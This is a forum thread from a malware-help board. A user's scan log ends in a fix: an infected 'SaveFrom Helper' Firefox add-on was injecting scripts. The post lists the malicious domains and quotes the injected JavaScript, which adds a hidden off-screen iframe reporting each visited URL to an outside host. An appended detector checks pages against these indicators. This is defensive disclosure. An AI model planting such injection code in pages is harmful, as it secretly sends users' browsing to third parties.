Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\WINDOWS\Tasks\update-S-1-5-21-2798130160-1945478871-1923780282-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe ==================== Loaded Modules (Whitelisted) ============== 2015-04-03 12:38 - 2014-08-27 16:31 - 00265080 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\txmlutil.dll 2015-04-03 12:38 - 2013-09-03 14:29 - 00101328 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdmetrics.dll 2015-04-03 12:38 - 2015-02-12 22:53 - 00003072 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\UI\accessl.ui 2015-04-03 12:38 - 2012-10-29 14:22 - 00152816 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\bdfwcore.dll 2015-05-06 19:55 - 2015-05-06 19:55 - 00790368 _____ () C:\Program Files\Bitdefender\Bitdefender 
2015\otengines_00350_004\ashttpbr.mdl 2015-05-06 19:55 - 2015-05-06 19:55 - 00711064 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpdsp.mdl 2015-05-06 19:55 - 2015-05-06 19:55 - 02683520 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttpph.mdl 2015-05-06 19:55 - 2015-05-06 19:55 - 01326504 _____ () C:\Program Files\Bitdefender\Bitdefender 2015\otengines_00350_004\ashttprbl.mdl 2015-03-27 21:49 - 2015-03-30 09:02 - 00020240 _____ () C:\WINDOWS\system32\spool\PRTPROCS\x64\TeamViewer_PrintProcessor.dll 2015-02-13 05:20 - 2015-02-13 05:20 - 00085832 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll 2015-02-13 05:20 - 2015-02-13 05:20 - 01346344 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll 2015-03-27 21:39 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2015-03-27 18:58 - 2015-05-12 05:30 - 00116368 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2013-11-28 23:35 - 2013-11-28 23:35 - 00011264 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\ActivateDesktopDebugger\ActivateDesktopDebugger.dll 2013-11-28 23:32 - 2013-11-28 23:32 - 00086016 _____ () C:\Program Files (x86)\Bluetooth Suite\Modules\Map\MAP.dll 2013-11-28 23:38 - 2013-11-28 23:38 - 00012928 _____ () C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe 2013-11-28 23:38 - 2013-11-28 23:38 - 00384128 _____ () C:\Program Files (x86)\Bluetooth Suite\ContactsApi.dll 2013-11-28 23:28 - 2013-11-28 23:28 - 00020992 _____ () C:\Program Files (x86)\Bluetooth Suite\L10n\de-DE\BtTray.de-DE.dll 2015-05-22 16:44 - 2015-05-22 16:44 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll 2015-05-22 20:22 - 2015-04-15 21:41 - 01616384 _____ () C:\Program Files (x86)\MediaMonkey\MediaMonkey64Helper.exe 2015-03-13 15:54 - 2015-03-13 15:54 - 00057344 _____ () C:\Program 
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
Percentage of memory in use: 66%
Total physical RAM: 8139.28 MB
Available physical RAM: 2732.42 MB
Total Pagefile: 11979.28 MB
Available Pagefile: 4991.53 MB
Total Virtual: 131072 MB
Available Virtual: 131071.77 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:1825.12 GB) (Free:1750.36 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 1863 GB) (Disk ID: 95F2A7AC)
Partition: GPT Partition Type.
==================== End of log ============================
Edited by RAnders00 (27.05.2015 at 11:15) |
27.05.2015, 11:04 | #2 |
/// the machine /// TB Trainer | Hi,
Please always post logs in code tags in the thread. |
30.05.2015, 14:36 | #3 |
| I found the solution.
I had an apparently infected version of the Firefox add-on "SaveFrom Helper". I removed the add-on, restarted Firefox, downloaded the add-on again from the official Mozilla add-on site, and the problem promptly disappeared. The add-on had injected JavaScript and frames into the pages. The sites that appeared in the scripts and frames were (for future users searching on Google):
Code:
i.mgicinjs.info
foxi69.tlscdn.com
f.asdfzxcv1312.com
endall41-q.apollocdn.com
q.nadijs.info
f.asdfzxcv1312.com
q.mgicinjs.info
Code:
(function () {
  try {
    // Run-once guard: the marker on window stops a second injection on the same page.
    if (typeof window['asdfdsasdfdsa'] === 'undefined') {
      setTimeout(function () {
        // Only act on http/https pages.
        var shouldThisPartOfCodeRun = document.URL.search('http') === 0;
        if (!shouldThisPartOfCodeRun) { return; }
        if (typeof DealPly !== 'undefined' && typeof DealPly.serverCallParam === 'string') {
          // Skip the report if a script with ".js?dn=" in its src is already on the page.
          var reportFlag = true;
          var scArr = document.getElementsByTagName('script');
          for (var index in scArr) {
            if (typeof scArr[index].src === 'string' && scArr[index].src.search('\\.js\\?dn=') !== -1) {
              reportFlag = false;
            }
          }
          if (!reportFlag) { return; }
          var host = 'hxxp://q.nadijs.info/';
          var isSecure = document.URL.search('https://') === 0;
          if (isSecure) { host = 'https://endall41-q.apollocdn.com/'; }
          var urlPath = 'dealdo/event-report?type=quick&';
          var iframe = document.createElement('iframe');
          var suffix = '';
          try {
            if (typeof JavaScriptJsTagUrl !== 'undefined') {
              suffix = JavaScriptJsTagUrl.substr(JavaScriptJsTagUrl.search('\?') + 1);
            }
          } catch (e324324) {}
          // Hidden 1x1 frame, moved off screen, that reports the visited URL and domain.
          iframe.setAttribute('style', 'position:relative; left:-10000px; width:1px; height:1px; visibility:hidden');
          iframe.setAttribute('src', host + urlPath + 'url=' + encodeURIComponent(document.URL) + '&domain=' + document.domain + '&topic=dpdiedarg&' + suffix);
          document.body.appendChild(iframe);
        }
      }, 10000); // fires 10 seconds after the script runs
      window['asdfdsasdfdsa'] = true;
    }
  } catch (e235534) {}
})();
FOR ENGLISH VISITORS: You have an infected version of the SaveFrom helper installed. Uninstall it and get a non-infected version from the official Mozilla add-on website.
Edited by RAnders00 (30.05.2015 at 14:43) |
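The injection described in the post above, turned into a check over a page's frames and scripts; this is an added example, not part of the original post. The function names, the `{tag, src, style}` snapshot shape, the size and offset thresholds and the sample elements are assumptions made for illustration; the hosts and the beacon path are the ones quoted in the post.

```javascript
// Hosts and beacon path quoted in the post above.
const IOC_HOSTS = [
  'i.mgicinjs.info', 'q.mgicinjs.info', 'foxi69.tlscdn.com',
  'f.asdfzxcv1312.com', 'endall41-q.apollocdn.com', 'q.nadijs.info',
];
const IOC_PATH = 'dealdo/event-report';

// Indicators are often shared defanged (hxxp://, [.]); undo that before parsing.
function refang(url) {
  return String(url).replace(/^hxxp/i, 'http').replace(/\[\.\]/g, '.');
}

// Parse an inline style attribute into a { property: value } map.
function parseStyle(style) {
  const out = {};
  for (const decl of String(style || '').split(';')) {
    const i = decl.indexOf(':');
    if (i > 0) out[decl.slice(0, i).trim().toLowerCase()] = decl.slice(i + 1).trim().toLowerCase();
  }
  return out;
}

// True when the inline style hides the element the way the injected frame is hidden:
// visibility:hidden or display:none, a box of 1px or less, or a large negative offset.
// The 1px and -1000px thresholds are assumptions of this example.
function isHidden(style) {
  const s = parseStyle(style);
  const px = (v) => (v === undefined ? NaN : parseFloat(v));
  if (s.visibility === 'hidden' || s.display === 'none') return true;
  if (px(s.width) <= 1 || px(s.height) <= 1) return true;
  return px(s.left) <= -1000 || px(s.top) <= -1000;
}

// Return one finding per element that matches an indicator or the hidden-frame pattern.
function inspectElements(elements, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  for (const el of elements) {
    if (!el.src) continue;
    let url;
    try { url = new URL(refang(el.src), pageUrl); } catch (e) { continue; }
    const reasons = [];
    if (IOC_HOSTS.some((h) => url.hostname === h || url.hostname.endsWith('.' + h))) {
      reasons.push('ioc-host');
    }
    if (url.pathname.includes(IOC_PATH)) reasons.push('ioc-path');
    // Simple third-party test: neither the page host nor one of its subdomains.
    const thirdParty = url.hostname !== pageHost && !url.hostname.endsWith('.' + pageHost);
    if (el.tag === 'iframe' && thirdParty && isHidden(el.style)) {
      reasons.push('hidden-third-party-frame');
    }
    // The beacon carries the visited address in its "url" query parameter.
    if (thirdParty && url.searchParams.get('url') === pageUrl) reasons.push('leaks-page-url');
    if (reasons.length) findings.push({ tag: el.tag, host: url.hostname, reasons });
  }
  return findings;
}

// In a browser console, build the snapshot from the live DOM: snapshot(document).
function snapshot(doc) {
  return Array.from(doc.querySelectorAll('iframe, script')).map((el) => ({
    tag: el.tagName.toLowerCase(),
    src: el.getAttribute('src'),
    style: el.getAttribute('style'),
  }));
}

// Constructed sample: a clean page plus the frame the injected script would append,
// and one entry pasted in defanged form.
const SAMPLE_PAGE = 'https://www.wolframalpha.com/';
const SAMPLE_ELEMENTS = [
  { tag: 'script', src: '/static/app.js', style: null },
  { tag: 'iframe', src: 'https://player.example.org/embed/1', style: 'width:560px; height:315px' },
  { tag: 'iframe', src: '/blank.html', style: 'display:none' },
  { tag: 'iframe',
    src: 'https://endall41-q.apollocdn.com/dealdo/event-report?type=quick&url=' +
      encodeURIComponent(SAMPLE_PAGE) + '&domain=www.wolframalpha.com&topic=dpdiedarg&',
    style: 'position:relative; left:-10000px; width:1px; height:1px; visibility:hidden' },
  { tag: 'iframe', src: 'hxxp://q.nadijs.info/dealdo/event-report?type=quick&', style: null },
];

console.log(JSON.stringify(inspectElements(SAMPLE_ELEMENTS, SAMPLE_PAGE), null, 2));
```

The hidden-frame and URL-leak reasons do not depend on the host list, so the same check still flags this pattern when the reporting hosts change.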
31.05.2015, 05:49 | #4 |
/// the machine /// TB Trainer | ok
__________________
Regards, schrauber
Proud Member of UNITE and ASAP since 2009
Donate | Guides and help | Trojaner-Board Facebook page
No help via PM! |